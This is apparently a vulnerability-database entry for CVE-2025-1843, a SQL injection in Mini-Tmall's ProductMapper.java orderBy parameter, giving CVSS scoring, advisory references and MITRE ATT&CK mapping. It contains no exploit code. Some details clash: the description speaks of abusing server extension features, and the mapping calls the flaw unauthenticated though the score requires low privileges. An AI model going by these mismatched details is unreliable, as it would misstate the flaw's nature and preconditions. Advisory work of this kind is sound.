CVE-2025-1843
Published: 03 March 2025
Description
Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems.
Security Summary
CVE-2025-1843 is a SQL injection vulnerability (CWE-74, CWE-89) in Mini-Tmall versions up to 20250211. The issue affects the select function in the file com/xq/tmall/dao/ProductMapper.java, where manipulation of the orderBy argument enables SQL injection. Published on 2025-03-03, it carries a CVSS v3.1 base score of 6.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L), though described as critical in initial reports.
The vulnerability allows remote exploitation by low-privileged users (PR:L) with low attack complexity and no user interaction required. Successful exploitation can result in limited impacts to confidentiality, integrity, and availability, potentially enabling unauthorized data access, modification, or disruption via injected SQL payloads.
VulDB advisories (ctiid.298109, id.298109) and related submissions document the issue, with a public proof-of-concept exploit disclosed on GitHub (qkdjksfkeg/cve_article/Tmall_demo/SQL%20injection.md). The vendor was contacted early but provided no response, and no patches or official mitigations are referenced.
The exploit has been publicly disclosed and may be used in attacks, increasing risk for unpatched Mini-Tmall deployments.
Details
- CWE(s)
Affected Products
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Unauthenticated SQL injection in public-facing web application (Mini-Tmall ProductMapper.java orderBy parameter) enables exploitation of public-facing application (T1190). VulDB explicitly maps to server software component abuse (T1505).